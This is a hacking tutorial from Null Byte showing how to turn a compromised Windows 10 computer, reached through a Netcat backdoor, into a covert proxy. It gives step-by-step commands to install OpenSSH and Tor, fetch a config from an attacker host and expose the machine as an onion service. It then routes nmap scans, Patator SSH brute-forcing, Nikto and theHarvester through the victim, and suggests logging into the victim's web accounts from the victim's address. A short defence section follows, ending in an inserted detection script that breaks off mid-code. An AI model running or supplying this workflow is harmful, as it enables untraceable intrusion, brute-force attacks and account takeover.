
How do I turn Windows PCs into Web proxies? «Null Byte :: WonderHowTo



A hacker with privileged access to a Windows 10 computer can configure it to act as a web proxy, allowing the attacker to attack devices and services on the network through the infected computer. The scans and attacks then appear to come from the Windows 10 computer, making it difficult to determine the attacker's actual location.

The attack relies on an OpenSSH server and Tor. Newer versions of Windows 10 may already ship with an SSH server installed, which makes it easier for an attacker to abuse the service.

While Tor is used in my example, other tools like ngrok and Serveo might work as substitutes. Those services have not been tested, however; Tor was chosen mainly because its connections are encrypted and private, which keeps the transmission of sensitive information more secure.

Why would someone do this to my computer?

It's remarkable what a black hat hacker can do with a Windows 10 device acting as a private proxy. If this happens to your computer, there is a good chance you are not the hacker's primary target. In enterprise environments, the compromised device becomes a pivot point that lets the attacker go after other people and computers on the corporate network.

On ordinary home networks, hackers can use the computer as a web proxy to conduct fraudulent credit card transactions, launch denial-of-service attacks, or distribute pirated content. The illegal activity appears to originate from your Windows 10 device and exposes you to serious legal risk.

The setup also has benefits for white hat penetration testers. For example, it is usually difficult to run tools such as Nikto, Nmap, Patator, curl, and theHarvester directly on the compromised device. With a proxy, these tools can be run through the Windows 10 device, which offers many opportunities to pivot to other devices without being directly connected to the target network.

Attack Scenario Requirements

You will need some things for this particular method.

Important Notice

In this guide, code blocks beginning with > indicate that the command is run in PowerShell on the Windows 10 system (that is, through the Netcat backdoor). Code blocks beginning with ~$ indicate commands run on Kali Linux.

Is OpenSSH already installed and running?

This attack requires an SSH server to be installed. The SSH server is distinct from the SSH client found in most versions of Windows 10. If OpenSSH is already installed, most of the following steps can be performed without administrator privileges. If OpenSSH is not installed, however, administrator rights are required to install it.

Below are some commands that can be used to determine if OpenSSH is already installed and running in the background.

First, check if the OpenSSH directory exists. If no directory exists, SSH is probably not installed.

> ls "C:\Program Files\OpenSSH"

The Get-NetTCPConnection cmdlet quickly shows which ports are in the Listen state, i.e. which services are waiting for connections. We can see that port 22, the default SSH port, is listening on this computer.

> Get-NetTCPConnection -State Listen

LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- - -------------
:: 49676 :: 0 Listen
:: 7680 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 22 :: 0 Listen
0.0.0.0 49676 0.0.0.0 0 Listen
0.0.0.0 5040 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
0.0.0.0 22 0.0.0.0 0 Listen

The default port number of any service can be changed to an arbitrary value, so this output alone is not conclusive.

With netstat, the process using a specific port can be identified. In my tests, however, netstat took much longer to finish than Get-NetTCPConnection; in some cases it took several minutes before the output arrived in the Netcat terminal. Get-NetTCPConnection can also be combined with other cmdlets to show which process owns each port, but this seemed like a good opportunity to show both options.

> netstat -ba

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:22 DESKTOP-U4E0WK3:0 LISTENING
[sshd.exe]
TCP 0.0.0.0:135 DESKTOP-U4E0WK3:0 LISTENING
RpcSs
[svchost.exe]
TCP 0.0.0.0:445 DESKTOP-U4E0WK3:0 LISTENING
Can not obtain ownership information
TCP 0.0.0.0:5040 DESKTOP-U4E0WK3:0 LISTENING
CDPSvc
[svchost.exe]
TCP 0.0.0.0:7680 DESKTOP-U4E0WK3:0 LISTENING
DoSvc
[svchost.exe]

In the output above we can clearly see that sshd.exe is bound to port 22.

Finally, Get-Process lists the processes running in the background, sorted alphabetically by name. Scroll to the S section and look for a process named sshd.

> Get-Process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
297 19 6760 24328 0.27 6104 1 ApplicationFrameHost
397 23 18056 50384 3.94 3784 0 aswEngSrv
701 24 19592 38364 12.05 3104 0 aswidsagent
4115 83 69404 40016 24.70 2336 0 AvastSvc
1888 44 22444 35008 4.30 1876 1 AvastUI

...

430 25 5924 15460 0.25 2628 0 spoolsv
98 11 1728 6664 0.05 7388 0 sshd
252 10 2524 7904 0.48 488 0 svchost
156 9 1852 7860 0.13 520 0 svchost
79 5 1040 3912 0.03 908 0 svchost 

If SSH is not found on the target system, an elevated (administrator) backdoor is required to run many of the following commands. If SSH is already running, skip ahead to Step 2.

Step 1: Setting Up SSH on the Windows 10 Target Computer

All of the following commands were executed through a reverse shell, which can be set up with a Netcat listener. Compromising a Windows 10 system to this extent has been covered in other Null Byte articles.

1. Download the OpenSSH Installation Script

In my tests, before Invoke-WebRequest (iwr) could download the OpenSSH binaries, the SecurityProtocol had to be set with the following command.

> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Download the file OpenSSH-Win64.zip from GitHub. At the time of writing, v7.9.0.0p1 beta is the latest stable release. This download can take a minute or two, depending on the network speed of the Windows 10 system. During this time, the Netcat terminal will not respond or display a progress bar. Be patient here.

> iwr https://github.com/PowerShell/Win32-OpenSSH/releases/download/v7.9.0.0p1-Beta/OpenSSH-Win64.zip -o $env:temp\OpenSSH-Win64.zip

2. Extracting the OpenSSH Archive

PowerShell versions above 5.1 include a convenient decompression cmdlet called Expand-Archive, which quickly unpacks the OpenSSH-Win64.zip file into the target's temporary directory.

> Expand-Archive -Path "$env:temp\OpenSSH-Win64.zip" -DestinationPath 'C:\Program Files\OpenSSH' -Force

Expand-Archive takes the input file (-Path $env:temp\OpenSSH-Win64.zip) and unpacks it into (-DestinationPath) a new folder named C:\Program Files\OpenSSH.

3. Run the OpenSSH Installation Script

Install the SSH server using the provided install-sshd.ps1 script. After a few seconds, if no errors occur, the terminal reports a successful installation. In one test an error was reported ("NoServiceFoundForGivenName"), but it did not seem to cause the installation to fail.

> & "C:\Program Files\OpenSSH\OpenSSH-Win64\install-sshd.ps1"

[SC] SetServiceObjectSecurity SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
The sshd and ssh-agent services were successfully installed 

4. Start the OpenSSH service

After installation, the SSH server does not start automatically, nor does it start automatically when the system reboots. The following net command is required to start the SSH server.

> net start sshd

The OpenSSH SSH Server service is starting.
The OpenSSH SSH Server service started successfully. 

5. Verify that the OpenSSH server is running

Use Get-NetTCPConnection or Get-Process to verify that the SSH server is running. Note that port 22 is now in the Listen state.

> Get-NetTCPConnection -State Listen

LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- - -------------
:: 49676 :: 0 Listen
:: 7680 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 22 :: 0 Listen
0.0.0.0 49676 0.0.0.0 0 Listen
0.0.0.0 5040 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
0.0.0.0 22 0.0.0.0 0 Listen

Step 2: Setting up Tor on the Windows 10 target computer

Once the OpenSSH server is running, Tor can be installed.

1. Downloading the Tor ZIP File

First, download the ZIP file containing the precompiled Tor binaries and DLLs. Currently, tor-win32-0.3.5.8.zip is the latest stable version; in the future it may be worth checking the Tor Project website for newer versions. Use the "Windows Expert Bundle" URL, not the tar.gz source archive.

> iwr 'https://www.torproject.org/dist/torbrowser/8.0.9/tor-win32-0.3.5.8.zip' -o $env:temp\tor.zip

2. Extracting Tor archive

With Expand-Archive, the ZIP file can again be decompressed into the temporary directory (-DestinationPath).

> Expand-Archive -Path $env:TEMP\tor.zip -DestinationPath $env:TEMP\tor

Then change (cd) into the new tor directory.

> cd $env:TEMP\tor\Tor

Use the ls command to list the contents of the directory.

> ls

Directory: C:\Users\USERNAME\AppData\Local\Temp\tor\Tor

Mode LastWriteTime Length Name
---- ------------- ----------
-a ---- 21.02.2013 15:31 2585371 libeay32.dll
-a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll
-a ---- 21.02.2013 15:31 601445 libevent_core-2-1-6.dll
-a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll
-a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll
-a ---- 21.02.2013 15:31 278533 libssp-0.dll
-a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll
-a ---- 21.02.2013 15:31 788352 ssleay32.dll
-a ---- 21.02.2013 15:31 1007104 tor-gencert.exe
-a ---- 2/21/2019 3:31 PM 3794944 tor.exe
-a ---- 21.02.2013 15:31 107520 zlib1.dll 

3. Create Torrc Configuration File

Note that there is no "torrc" file in the ls output. torrc is the configuration file that tells Tor how to behave. In this case we want Tor to create a new onion service address. Anyone who has previously set up a Tor onion service will recognize the HiddenServiceDir and HiddenServicePort options in the torrc file. They define the directory where Tor stores the onion service's keys and hostname, and the port the onion service forwards to.

In my tests there were some annoying word-wrapping errors when the torrc file was created with echo and other PowerShell cmdlets for writing files. In the end it was easier to host the desired torrc file on a remote server and simply download it with PowerShell.

First, find the target's username with the $env variable in PowerShell. This username is needed for the torrc configuration file below.

> echo $env:username

tokyoneon 

Now create a file named "torrc" on Kali or on a virtual private server and save the configuration below into it. Alternatively, the file can be hosted on a file-sharing site or on GitHub.

HiddenServiceDir C:\Users\USERNAME\AppData\Local\Temp\tor\Tor\HS
HiddenServicePort 22 127.0.0.1:22

4. Downloading the torrc File to the Target System

To serve the torrc file, start a simple Python 3 web server, which makes the file reachable from the local network and the internet.

~$ python3 -m http.server 80

On Windows 10, the Invoke-WebRequest command is used again to download the torrc configuration file. The attacker's domain may be an IP address on the Wi-Fi network, the address of a virtual private server, or a file-sharing site such as GitHub.

> iwr attacker.com/torrc -o torrc

Now use ls to verify that the torrc file was saved correctly.

> ls

Directory: C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor

Mode LastWriteTime Length Name
---- ------------- ----------
-a ---- 21.02.2013 15:31 2585371 libeay32.dll
-a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll
-a ---- 21.02.2013 15:31 601445 libevent_core-2-1-6.dll
-a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll
-a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll
-a ---- 21.02.2013 15:31 278533 libssp-0.dll
-a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll
-a ---- 21.02.2013 15:31 788352 ssleay32.dll
-a ---- 21.02.2013 15:31 1007104 tor-gencert.exe
-a ---- 2/21/2019 3:31 PM 3794944 tor.exe
-a ---- 5/7/2019 9:03 PM 99 Torrc
-a ---- 2/21/2019 3:31 PM 107520 zlib1.dll 

Then use cat to read the file contents.

> cat torrc

HiddenServiceDir C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\HS
HiddenServicePort 22 127.0.0.1:22

5. Start the Tor Process

Finally, start tor.exe with the following command. After running it, wait for the Netcat terminal to display "Bootstrapped 100%: Done", which indicates that Tor started correctly. Press Enter on the keyboard to return to an interactive Netcat shell.

> Start-Process -NoNewWindow -FilePath .\tor.exe -ArgumentList '-f', 'torrc'

PS C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor> May 08 10:43:43.090 [notice] Tor 0.3.5.8 (git-5030edfb534245ed) running on Windows 8 [or later] with Libevent 2.1.8-stable, OpenSSL 1.0.2q, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.
May 08 10:43:43.152 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
May 08 10:43:43.699 [notice] Read configuration file "C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\torrc".
May 08 10:43:43.715 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\<default>. Is this what you wanted?
May 08 10:43:43.715 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\<default>. Is this what you wanted?
May 08 10:43:43.762 [notice] Opening Socks listener on 127.0.0.1:9050
May 08 10:43:43.762 [notice] Opened Socks listener on 127.0.0.1:9050
May 08 10:43:43.000 [notice] Bootstrapped 0%: Starting
May 08 10:43:43.000 [notice] Starting with guard context "default"
May 08 10:43:45.000 [notice] Bootstrapped 5%: Connecting to directory server
May 08 10:43:45.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
May 08 10:43:48.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
May 08 10:43:49.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
May 08 10:43:50.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
May 08 10:43:56.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
May 08 10:43:57.000 [notice] Bootstrapped 40%: Loading authority key certs
May 08 10:44:00.000 [notice] The current consensus has no exit nodes. Tor can only build internal paths, such as paths to onion services.
May 08 10:44:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors for internal paths
May 08 10:44:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6680, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of end bw (no exits in consensus, using mid) = 0% of path bw.)
May 08 10:44:04.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6680, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of end bw (no exits in consensus, using mid) = 0% of path bw.)
May 08 10:44:05.000 [notice] Bootstrapped 50%: Loading relay descriptors for internal paths
May 08 10:44:06.000 [notice] The current consensus contains exit nodes. Tor can build exit and internal paths.
May 08 10:44:13.000 [notice] Bootstrapped 56%: Loading relay descriptors
May 08 10:44:15.000 [notice] Bootstrapped 64%: Loading relay descriptors
May 08 10:44:16.000 [notice] Bootstrapped 70%: Loading relay descriptors
May 08 10:44:18.000 [notice] Bootstrapped 76%: Loading relay descriptors
May 08 10:44:18.000 [notice] Bootstrapped 80%: Connecting to the Tor network
May 08 10:44:19.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
May 08 10:44:23.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
May 08 10:44:28.000 [notice] Bootstrapped 100%: Done

6. Find the Onion Address

After Tor has started, a new directory called "HS" is created. It contains the hostname file holding the onion address. Use cat to view the file contents.

> cat HS\hostname

w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion 

Step 3: Connecting to the OpenSSH Server via Tor

Back in Kali Linux, Tor must be installed in order to interact with the new onion service.

1. Installing Tor in Kali Linux

Tor can be installed in Kali with apt-get install -y tor, but it is better to install it from the Tor Project repository. That installation was covered in a recent Null Byte article on hiding SSH services from Shodan; refer to it for detailed installation instructions.

2. Testing the SSH Connection

Before we start proxying hacking tools through Windows 10, we need to make sure the SSH server is reachable from the Kali system. The torsocks command should be included with the Tor package; if not, install it with the following command.

~$ apt-get install torsocks

Reading package lists... Done
Building dependency tree
Reading state information... Done
torsocks is already the newest version (2.3.0-2).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Then use torsocks with ssh to connect to the SSH server running on the Windows 10 target device.

~$ torsocks ssh -v -p22 user@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion

It may take up to 60 seconds, and several attempts, for the connection to be established. This slowness is common with new onion services and with SSH over Tor. If the SSH connection is made, great: everything works as expected. Type exit or press Ctrl+D to end the SSH session.

3. Enable the Proxy Option

Open a new terminal and use the following command to open a SOCKS5 proxy on port 1337. The port number is arbitrary and can be changed to any value below 65535.

~$ torsocks ssh -D1337 -C -p22 tokyoneon@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion

Microsoft Windows [Version 10.0.17134.706]
(c) 2018 Microsoft Corporation. All rights reserved.

tokyoneon@DESKTOP-U4E0WK3 C:\Users\tokyoneon>

This is a new SSH terminal, and it is not meant to be interacted with. As long as it stays open, the proxy remains available. In Kali, verify that the proxy port was opened with the ss command, which lists listening ports. Note port 1337 on 127.0.0.1: this is the address hacking tools and web browsers will be configured to use to proxy requests through the hacked Windows 10 computer.

~$ ss -tpl

State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:1337       0.0.0.0:*     users:(("ssh",pid=5798,fd=4))

Step 4: Configure the hacking tools to use the proxy

Normally, SOCKS5 proxies are used to bypass content filters or as an alternative to a virtual private server. In this case, hacking tools are routed through the Windows 10 computer.

Many tools can be configured to use this proxy. Proxychains is a good example: with it, many command-line tools can be proxied over the SSH connection.

1. Install Proxychains

Make sure proxychains is installed in Kali Linux, which can be done with the following command.

~$ apt-get install proxychains

By default, proxychains is configured to anonymize requests through Tor on port 9050, so its configuration file needs to be changed.

Use nano to open the proxychains.conf file. Change the very last line in the file from "socks4 127.0.0.1 9050" to "socks5 127.0.0.1 1337" and exit nano.

~$ nano /etc/proxychains.conf

2. Proxy Nmap Scans

Many users will want to run Nmap scans through the Windows 10 computer once the SOCKS5 proxy is up. Note that Nmap's built-in proxy support is limited: not all Nmap scan types work, even when combined with proxychains.

~$ proxychains nmap -p80,22,21,443,8080,8443 -sS -T5 192.168.1.1/24

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 (https://nmap.org) at 2019-05-08 19:25 UTC
Nmap scan report for 192.168.1.183
Host is up (0.00093s latency).

PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
80/tcp   filtered http
443/tcp  filtered https
8080/tcp filtered http-proxy
MAC Address: 16:BE:3F:F6:E1:22 (Hewlett Packard)

Nmap scan report for 192.168.1.225
Host is up (0.0023s latency).

PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
80/tcp   closed http
443/tcp  closed https
8080/tcp open   http-proxy
MAC Address: 74:B3:4C:D2:33:A2 (Sony)

Nmap scan report for 192.168.1.1
Host is up (0.000044s latency).

PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http
443/tcp  closed https
8080/tcp closed http-proxy

Nmap done: 256 IP addresses (3 hosts up) scanned in 8.39 seconds

3. Proxy Curl Commands

curl is a powerful command-line tool for making many kinds of web requests, and it supports many protocols and features. It is useful for enumerating the types of web servers running on devices on the network. Unlike many other tools, curl has built-in SOCKS5 support, invoked with the --proxy option.

~$ curl --proxy socks5://127.0.0.1:1337 -I "http://192.168.1.225"

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.6.8
Date: Thu, 09 May 2019 21:34:29 GMT
Content-type: text/html; charset=utf-8
Content-Length: 1387

Curl with Proxychains also works as expected.

~$ proxychains curl http://192.168.1.225:8080

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
<title>Directory listing for /</title>
...
<h1>Directory listing for /</h1>

On the server side, we see that the request came from 192.168.1.183. That is the IP address of the Windows 10 device, not of the Kali system sitting on another network somewhere else in the world.

Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.1.183 - - [09/May/2019 21:51:51] "HEAD / HTTP/1.1" 200 -
192.168.1.183 - - [09/May/2019 21:51:58] "GET / HTTP/1.1" 200 -

4. Proxy Patator Brute-Force Attacks

Patator is a command-line brute-force tool. With proxychains, Patator can brute-force services through the Windows 10 computer. Although I have not tested it, the same syntax should work for other brute-forcing tools such as Hydra and Medusa.

Be sure to read my articles "Breaking Patator In Router Gateways" and "Network-Based Attacks with an SBC Implant" for a detailed look at setting up and using Patator.

~$ proxychains patator ssh_login host=192.168.1.225 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1

ProxyChains-3.1 (http://proxychains.sf.net)
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-05-08 20:51 UTC
INFO -
INFO - code  size   time | candidate    |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22    5.921 | 123456       |     1 | Authentication failed.
INFO - 1     22    5.496 | Abcdef123    |     2 | Authentication failed.
INFO - 1     22    5.619 | a123456      |     3 | Authentication failed.
INFO - 1     22    5.532 | little123    |     4 | Authentication failed.
INFO - 1     22    5.640 | nanda334     |     5 | Authentication failed.
INFO - 0     30    2.583 | tokyoneon    |     6 | SSH-2.0-OpenSSH_7.9p1 Debian-5
INFO - 1     22    5.723 | abc12345     |     7 | Authentication failed.
INFO - 1     22    5.501 | Password     |     8 | Authentication failed.
INFO - 1     22    5.567 | Pawerjon123  |     9 | Authentication failed.

The server side shows the failed password guesses arriving from the Windows 10 IP address (192.168.1.183). This is further confirmation that attacks originating from the Kali system are being routed through the Windows 10 computer as intended.

sshd[1353]: Failed password for root from 192.168.1.183 port 50148 ssh2
sshd[1353]: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50148 ssh2 [preauth]
sshd[1353]: Disconnecting authenticating user root 192.168.1.183 port 50148: Too many authentication failures [preauth]
sshd[1353]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1353]: PAM service(sshd) ignoring max retries; 6 > 3
sshd[1358]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd[1358]: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50149 ssh2 [preauth]
sshd[1358]: Disconnecting authenticating user root 192.168.1.183 port 50149: Too many authentication failures [preauth]
sshd[1358]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1358]: PAM service(sshd) ignoring max retries; 6 > 3
sshd[1362]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183  user=root
sshd[1362]: Failed password for root from 192.168.1.183 port 50150 ssh2
sshd[1362]: Accepted password for root from 192.168.1.183 port 50150 ssh2

5. Proxy theHarvester Scans

TheHarvester is an information gathering tool intended for penetration testers in the early stages of red team engagements. It features the ability to perform virtual host verification, DNS enumeration, reverse domain searches, and IP lookups, as well as make Shodan queries.

~$ proxychains theharvester -d nmap.org -l 200 -b bing,censys,yahoo

ProxyChains-3.1 (http://proxychains.sf.net)

*******************************************************************
*                                                                 *
* | |_| |__   ___    /  /__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __| '_  / _   / /_/ / _` | '__  / / _ / __| __/ _  '__| *
* | |_| | | | __/ / __  / (_| | |    V /  __/__  ||  __/ |    *
*  __|_| |_|___| / /_/ __,_|_| _/ ___||___/_____|_| *
*                                                                 *
* theHarvester Ver. 3.0.6                                         *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* cmartorella@edge-security.com                                   *
*******************************************************************

found supported engines
[-] Starting harvesting process for domain: nmap.org

[-] Searching in Censys:
[-] Searching in Bing:
    Searching 50 results...
    Searching 100 results...
    Searching 150 results...
    Searching 200 results...
[-] Searching in Yahoo..
    Searching 0 results...
    Searching 10 results...
    Searching 190 results...
    Searching 200 results...

Harvesting results
No IP addresses found

[+] Emails found:
------------------
fyodor@nmap.org
dev@nmap.org
c@nmap.org

[+] Hosts found in search engines:
------------------------------------

Total hosts: 6

[-] Resolving hostnames IPs...

issues.nmap.org:45.33.49.119
research.nmap.org:71.6.152.72
scanme.nmap.org:45.33.32.156
svn.nmap.org:45.33.49.119
www.nmap.org:45.33.49.119

6. Proxy Nikto Scans

Nikto is a simple web server scanner that examines a website and reports discovered vulnerabilities that can later be used to compromise the site.

While Nikto has built-in support for HTTP proxies, that support can't be used with this SOCKS5 proxy. I didn't test many of Nikto's options and arguments, but simple scans through proxychains seemed to work properly. Readers are encouraged to experiment with this before relying on it in a real engagement.

~$ proxychains nikto -host 192.168.1.225 -port 8080 -nossl

ProxyChains-3.1 (http://proxychains.sf.net)
- Nikto v2.1.6
---------------------------------------------------------------------------
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ Target IP:          192.168.1.225
+ Target Hostname:    192.168.1.225
+ Target Port:        8080
+ Start Time:         2019-05-08 19:33:26 (GMT0)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/3.6.8
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK

7. Proxy Web Requests with Firefox

Security-focused routers and web services make it possible to define blacklist and whitelist rules based on MAC and IP addresses. For example, this particular router only allows the Windows 10 computer to access the router's gateway. Attempting to access 192.168.1.1 from any other device on the network displays the following message.

Now, it would be possible to spoof Kali's MAC and IP address to trick the router into letting us view the gateway. But the SSH proxy can achieve the same goal.

Open Firefox in Kali, and enter about:preferences into the URL bar. In "General," click on the "Settings" button.

Configure the proxy settings as shown below, then click "OK."

Now, navigating to 192.168.1.1 to access the router is allowed because the router believes the requests are coming from the whitelisted Windows 10 device.

The very same concept applies to websites like Twitter and Gmail, making it possible to access the target's accounts without raising too many red flags. Those websites will see that the origin (i.e., the IP address) of the login is identical to the IP address used by the Windows 10 computer.

How to Protect Yourself (Conclusion)

It's important to note that this demonstrates only one way an attacker can use a compromised computer as a proxy. In earlier drafts of this article, the target's router and Windows 10 firewall were modified to allow port forwarding and remote access, which would also let an attacker reach the SSH server from anywhere in the world.

Furthermore, admin privileges are not always required. Tor, for example, can be downloaded and run without special rights and can be configured to forward requests to any service or port on the network, with no SSH server or SOCKS5 proxy involved.

These attacks were tested and performed on fully patched Windows 10 systems running Avast and AVG antivirus software, so I can't recommend those as a solution. Readers will need to actively inspect running processes, look for suspicious software, and monitor traffic leaving their systems.

1. Inspect Outgoing Traffic with Wireshark

Wireshark is a great packet-capturing tool for observing packets leaving the network. If an attacker is using Tor, for example, the IP address of the Tor relay the system talks to can be looked up on ExoneraTor. Similarly, Netcat traffic is easy to spot in Wireshark captures.

Wireshark capture of an IP address (server) used by Tor relay.

2. Create Strict Firewall Rules with pfSense

While pfSense installations can be a little involved and technical, it's an excellent open-source firewall solution. It can be installed on a Raspberry Pi, for example, and placed between the router and modem to monitor and capture traffic on the network.

Image via Lawrence Systems/PC Pickup/YouTube

3. Monitor Running Processes with Task Manager

This solution isn't always entirely effective. Process names can be changed or spoofed, but a lazy hacker may leave the file names at their defaults (i.e., "tor.exe"), making them easier to detect on a compromised Windows 10 system. Below is an example of both an OpenSSH and a Tor process running in the background, easily identified in the Windows 10 Task Manager.
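As a scripted counterpart to the Task Manager check, and to the port-to-process correlation mentioned earlier alongside Get-NetTCPConnection, here is an added PowerShell script that is not part of the original article. It maps every listening TCP port to its owning process, then hunts for the specific artifacts this setup leaves behind: the sshd service, tor/sshd processes, binaries running out of a user's Temp folder, and torrc or onion-service hostname files. The process names and paths it searches for are assumptions taken from the defaults used in this article; run it in an elevated PowerShell session.

```powershell
# Added defender-side check (not from the original article). Assumes the
# defaults used in the write-up: sshd.exe on port 22, tor.exe dropped under
# %TEMP%\tor\Tor with a torrc and an HS\hostname file, Tor SOCKS on 9050.
$findings = [System.Collections.Generic.List[string]]::new()

# 1. Map each listening TCP port to the process that owns it. This is the
#    correlation netstat -ba gives you, but without the long wait.
$listeners = Get-NetTCPConnection -State Listen | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [pscustomobject]@{
        LocalAddress = $_.LocalAddress
        LocalPort    = $_.LocalPort
        Pid          = $_.OwningProcess
        Process      = if ($proc) { $proc.ProcessName } else { '<unknown>' }
        Path         = if ($proc) { $proc.Path } else { $null }
    }
}
$listeners | Sort-Object LocalPort | Format-Table -AutoSize

# Port 22 (an SSH server) and 9050 (Tor's default SOCKS listener) deserve
# a closer look on a desktop that should not be running either.
foreach ($l in $listeners) {
    if ($l.LocalPort -in 22, 9050) {
        $findings.Add("Listening on port $($l.LocalPort): $($l.Process) (PID $($l.Pid)) $($l.Path)")
    }
}

# 2. Processes named tor/sshd/ssh-agent, plus anything executing from a
#    Temp directory, which is where the article unpacks tor.exe.
Get-Process | Where-Object {
    $_.ProcessName -match '^(tor|sshd|ssh-agent)$' -or
    ($_.Path -and $_.Path -match '\\AppData\\Local\\Temp\\')
} | ForEach-Object {
    $findings.Add("Suspicious process: $($_.ProcessName) (PID $($_.Id)) $($_.Path)")
}

# 3. Is the OpenSSH Server service installed at all, and is it running?
$sshd = Get-Service -Name sshd -ErrorAction SilentlyContinue
if ($sshd) {
    $findings.Add("OpenSSH Server service present: status $($sshd.Status), start type $($sshd.StartType)")
}

# 4. File artifacts: a torrc, a tor.exe, or an onion-service hostname file
#    anywhere under any user's Temp directory.
Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    $temp = Join-Path $_.FullName 'AppData\Local\Temp'
    if (Test-Path $temp) {
        Get-ChildItem $temp -Recurse -Force -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -in 'torrc', 'tor.exe', 'hostname' } |
            ForEach-Object { $findings.Add("Tor artifact: $($_.FullName)") }
    }
}

if ($findings.Count -eq 0) {
    'No OpenSSH/Tor proxy indicators found.'
} else {
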